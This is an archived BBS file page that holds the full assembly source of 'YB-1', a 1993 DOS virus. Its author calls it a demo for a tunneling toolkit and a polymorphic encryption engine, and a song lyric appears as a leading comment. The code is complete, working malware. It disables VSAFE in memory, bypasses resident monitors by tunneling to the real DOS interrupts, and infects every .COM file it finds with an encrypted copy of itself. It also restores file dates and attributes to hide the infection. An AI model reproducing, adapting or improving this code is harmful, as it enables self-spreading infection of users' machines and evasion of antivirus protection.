home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Phoenix Rising BBS
/
phoenixrising.zip
/
phoenixrising
/
vir-docs
/
crptlt18.arj
/
YB-1.ASM
< prev
next >
Wrap
Assembly Source File
|
1993-09-11
|
16KB
|
442 lines
comment #
PRE-IGNITION
Hey you...
Tell me, what's your call name
Closed, negative display
Engaged on section three
The acrid factories
You...
Putrid perfect product
Proper platinum parts
Proficient prototypes
Steadily spew from these pipes
Are you...
The prime automaton
Christened as YB-1
Hey you...
Generated by waste
Arid quarry displaced
Enviro-mental squeeze
Aluminum disease
You...
Conscious of origin
Intention in the wind
Atmosphere infected
Descendants defected
Are you...
Novel stroke of design
Or relics from this mine
Casually, choke,
Noxious nourishment
Embodied, illicit cure
Ground and rock and sand
Come crumble tumble down
Grinding round
The hydraulic wheel
Extraction,
For ultimate greed
Now... hidden from view
Surveying stable shifts
A feeble groove
Unintentional split
Then they return to work
As if they're not disturbed
Cybernetic beings
Omniscient regiment
Thriving with vigor
Incessant loop
An assumed order
Auspicious tool
Frantically, flow
Spumous sediment
Remedied, neurotic fuse
Ground and rock and sand
Come crumble tumble down
Yonder sound, an echoing gong
Disjunction
Of their disowned song
Now... some are set free
Emotions flood their gaze
Synthetic breed
The pre-ignition phase
Pre-ignition
Flares up in you
Pre-ignition
Provokes me too.
#
;**********************************************************************
; YB-1.ASM
; AUTHOR: Köhntark
;
; Demonstration Virus for Köhntark's Recursive Tunneling Toolkit 4.1
; Demonstrates how to use KRTT 4.1 in conjunction with TpE 1.3.
; Please note that this is another 'unremarkable' computer virus.
; It is just a demo.
;**********************************************************************
extrn rnd_init:near ;TpE
extrn crypt:near ;TpE
extrn tunnel:near ;KRTT 4.1
MAIN SEGMENT BYTE
ASSUME cs:main,ds:main,ss:nothing ;all part in one segment=com file
ORG 100h
;**********************************
; fake host program
;**********************************
HOST:
db 0E9h,0Ah,00 ;jmp NEAR PTR VIRUS
db ' '
db 090h,090h,090h
mov ah,4CH
mov al,0
int 21H ;terminate normally with dos
;═════════════════════════════════════════════════════════════════════════════
;**********************************
; VIRUS CODE STARTS HERE
;**********************************
VIRUS: ;a label for the first byte of the virus
call GET_ENTRY_PT ;when call is performed absolute address goes to stack
GET_ENTRY_PT:
pop si
sub si,GET_ENTRY_PT - VIRUS ;fix absolute address
;************************************
; restore 4 original bytes to file
;************************************
push si ;save si
cld ;clear direction flag
add si,START_CODE-VIRUS
mov di,0100h
movsw ;this is shorter & faster than
movsw ;mov cx,04 and rep movsb
pop si ;restore si
;************************************
; REMOVE CPAV-MSAV VSAFE FROM MEMORY
; (if present)
;************************************
mov dx,5945h
mov ax,0FA01h ;AL=01 very important!
int 21h
;************************************
; call KRTT 4.1
;************************************
push es ;save es
call TUNNEL ;call KTTR 4.1
pop es ;restore es
cmp ah,01 ;int 21h found?
je CONTINU ;go on if so
cmp ah,02 ;int 21h not hooked?
jne EXIT_VIRUS2 ;exit if not
;************************************
; save INT 21h address if found
;************************************
CONTINU:
mov WORD PTR [si + INT_21 -VIRUS],di ;int 21h offset
mov WORD PTR [si + INT_21 -VIRUS+2],dx ;int 21h segment
;************************************
; CHECK INT 2Ah
;************************************
; NOTE: INT 2A points to a IRET in all DOS versions. This interrupt is hooked
; by NETWARE & similar software so a check is made to see if such programs are
; present.
; A Russian resident monitoring program hooks this vector as it it called
; from within DOS's INT 21h in all file openings. (INT 21h, AH=3D)
; Restoring the original INT 2A defeats effectively such program.
mov bp,01 ;search for INT 2A
push es ;save es
call TUNNEL ;call KTTR 4.1
pop es ;restore es
cmp ah,02 ;int 2Ah not hooked?
je INT_2A_OK ;proceed
cmp ah,01 ;int 2ah found?
je CHECK_INT_2A ;exit if not
jmp short EXIT_VIRUS2
CHECK_INT_2A:
xor ax,ax
int 2Ah ;check for Netware, etc.
cmp ax,00
jne EXIT_VIRUS2
push es ;save es
xor bx,bx ;bx=0
mov es,bx ;es=0
cli ;disable interrupts
mov WORD PTR es:[4 * 2Ah],di ;restore int 2A offset
mov WORD PTR es:[4 * 2Ah + 2],dx ;restore int 2A segment
sti ;enable interrupts
pop es ;restore es
INT_2A_OK:
;************************************
; redirect DTA onto virus code
;************************************
lea dx,[si+ DTA - VIRUS] ;put DTA at the end of the virus for now
mov ah,1ah ;set new DTA function
int 21h
;************************************
; Routines called from here
;************************************
call FIND_FILE ;get a com file to attack!
;═════════════════════════════════════════════════════════════════════════════
EXIT_VIRUS:
;************************************
; set old DTA address
;************************************
mov ah,1ah
mov dx,80h ;fix dta back to return control to
int 21h ;host program
EXIT_VIRUS2:
;****************************************************************
; zero out registers for return to
; host program
;****************************************************************
mov si,0100h
xor bx,bx ;zero regs
xor ax,ax
cwd
push si ;save return address in stack
xor si,si
xor di,di
ret ;back to com host
;═════════════════════════════════════════════════════════════════════════════
FIND_FILE:
lea dx,[si + FILES_TO_INFECT - VIRUS]
mov ah,4eh ;do DOS search 1st function
mov cx,3fh ;search for any file, with any attributes
NEXT_FILE: int 21h
jc NO_MO ;return if not zero
call CHECK_N_INFECT_FILE ;check file if file found
mov ah,4fh ;file no good..find next function
jmp NEXT_FILE ;test next file for validity
NO_MO:
ret
;═════════════════════════════════════════════════════════════════════════════
NO_GOOD:
jmp GET_OUT
;----------------------------------------------------------------------------
CHECK_N_INFECT_FILE:
;*********************************************
; 1-Set attributes
;*********************************************
lea dx,[si + DTA_File_Name - VIRUS] ;dx = DTA filename ptr
xor cx,cx ;clear attributes
mov ax,4301h ;set file attributes to cx
pushf ;save flags
call DWORD PTR [si + INT_21 - VIRUS] ;call real int21h
jc NO_MO ;error.. quit
;*****************
; 2-OPEN FILE
;*****************
mov ax,3D02h ;r/w access to it
pushf ;save flags
call DWORD PTR [si + INT_21 - VIRUS] ;call real int21h
jc NO_GOOD ;error.. quit
xchg bx,ax ;bx = file handle
;********************
; 3-Read 1st 5 bytes
;********************
mov cx,5 ;read first 5 bytes of file
lea dx,[si + START_CODE - VIRUS] ;store'em here
mov ah,3Fh ;DOS read function
pushf ;save flags
call DWORD PTR [si + INT_21 - VIRUS] ;call real int21h
jc NO_GOOD ;error? get next file
;*********************
; 4-CHECK FILE
;*********************
mov ax,WORD PTR [si + DTA_File_SIZE - VIRUS] ;get file's size
add ax,FINAL - VIRUS + 232d + 1640d + 100h ;add virus size to it
jc NO_GOOD ;bigger then 64K:nogood
cmp WORD PTR [si + START_CODE - VIRUS],'ZM' ;EXE file?
je NO_GOOD ;no? good
cmp BYTE PTR [si + START_CODE - VIRUS],0E9H ;compare 1st byte to near jmp
jne INFECT ;not a near jmp, file ok
cmp BYTE PTR [si + START_CODE+3 - VIRUS],20h ;check for ' '
je NO_GOOD ;file ok .. infect
INFECT:
;*********************
; 5-set PTR @EOF
;*********************
mov ax,4202H
xor cx,cx ;prepare to write virus on file
cwd ;position file pointer,cx:dx = 0
pushf ;save flags
call DWORD PTR [si + INT_21 - VIRUS] ;call real int21h
;*********************
; 6-call TpE
;*********************
mov bp,ax ;starting offset of decryptor
add bp,0100h ;fix bp
push ds ;save necessary registers
push si
push bx ;save file handle
mov ax,cs
add ax,0500h
mov es,ax ;fix new es segment
call rnd_init ;initialize random # gen
mov ax,00000110b ;initialize TPE flags
;ds = cs
mov dx,si ;virus's starting address
mov cx,FINAL - VIRUS + 248d + 1640d ;size of code to be encrypted + KTT's size + TPE's size
xor si,si ;distance between decryptor & code
call crypt ;call TpE
;*********************
; 7-Write Virus
;*********************
pop bx ;restore bx=file handle
;cx=decryptor + code size + KRTT's size + TPE's size
;write from ds:dx
mov ah,40h
pop si ;restore necessary registers
pushf ;save flags
call DWORD PTR cs:[si + INT_21 - VIRUS] ;call real int21h, SEGMENT OVERRIDE NEEDED
;since ds does not equal cs yet
pop ds
mov ax,ds
mov es,ax
;*********************
; 8-set PTR @BOF
;*********************
mov ax,4200h ;locate pointer at beginning of host
xor cx,cx
cwd ;position file pointer,cx:dx = 0
pushf ;save flags
call DWORD PTR [si + INT_21 - VIRUS] ;call real int21h
;******************************************
; 9-write new 4 bytes to beginning of file
;******************************************
mov ax,WORD PTR [si + DTA_File_SIZE - VIRUS]
sub ax,3
mov WORD PTR [si + START_IMAGE+1 - VIRUS],ax
mov cx,4 ;#of bytes to write
lea dx,[si+ START_IMAGE - VIRUS] ;ds:dx=pointer of data to write
mov ah,40h ;DOS write function
pushf ;save flags
call DWORD PTR [si + INT_21 - VIRUS] ;call real int21h
;*************************************************
; 10-Restore date and time of file to be infected
;*************************************************
mov ax,5701h
mov dx,WORD PTR [si + DTA_File_DATE - VIRUS]
mov cx,WORD PTR [si + DTA_File_TIME - VIRUS]
pushf ;save flags
call DWORD PTR [si + INT_21 - VIRUS] ;call real int21h
;****************
; 11-Close File
;****************
GET_OUT:
mov ah,3Eh
pushf ;save flags
call DWORD PTR [si + INT_21 - VIRUS] ;call real int21h
;*************************************************
; 12-Restore file's attributes
;*************************************************
lea dx,[si + DTA_File_Name - VIRUS] ;get filename
xor cx,cx
mov cl,BYTE PTR [si + DTA_File_ATTR - VIRUS] ;get old attributes
mov ax,4301h ;set file attributes to cx
pushf ;save flags
call DWORD PTR [si + INT_21 - VIRUS] ;call real int21h
ret ;infection done!
;═════════════════════════════════════════════════════════════════════════════
NAME_AUTHOR db 'YB-1 / Köhntark'
FILES_TO_INFECT db '*.COM',0
START_CODE db 090h,090h,090h,090h,090h ;area to store 5 bytes to w/r from / to file
START_IMAGE db 0E9h,0,0,020h
INT_21 dd 0 ;REAL INT 21h's address
DTA db 21 dup(0) ;reserved
DTA_File_Attr db ?
DTA_File_Time dw ?
DTA_File_Date dw ?
DTA_File_Size dd ?
DTA_File_Name db 13 dup(0)
;═════════════════════════════════════════════════════════════════════════════
FINAL: ;label of byte of code to be kept in virus when it moves
MAIN ENDS
END HOST